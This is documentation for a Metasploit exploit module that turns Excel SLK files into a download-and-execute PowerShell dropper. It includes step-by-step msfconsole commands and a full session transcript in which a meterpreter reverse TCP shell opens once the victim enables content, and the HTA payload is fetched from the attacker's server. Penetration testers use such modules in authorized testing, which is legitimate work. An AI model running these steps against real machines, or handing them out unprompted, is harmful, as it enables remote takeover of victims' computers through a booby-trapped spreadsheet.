1.6 KiB
1.6 KiB
Introduction
The .slk file format used by Microsoft Excel has the ability to execute local commands via the EEXEC(cmd) function.
This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
on the target.
Vulnerable Application
Microsoft Excel (tested on Excel 2016)
Verification Steps
- Start
msfconsole use exploit/windows/fileformat/office_excel_slkset LHOST [IP]set SRVHOST [IP]run- Open generated file and press 'Enable Content' in Excel
Options
FILENAME
The name of the generated .slk file. Default is a randomly generated file name.
Scenarios
Microsoft Excel 2016 on Windows 10 Build 17763.288
msf > use exploit/windows/fileformat/office_excel_slk
msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_excel_slk) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_excel_slk) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_excel_slk) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
Once the victim opens the file and clicks 'Enable Content' a session should spawn:
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500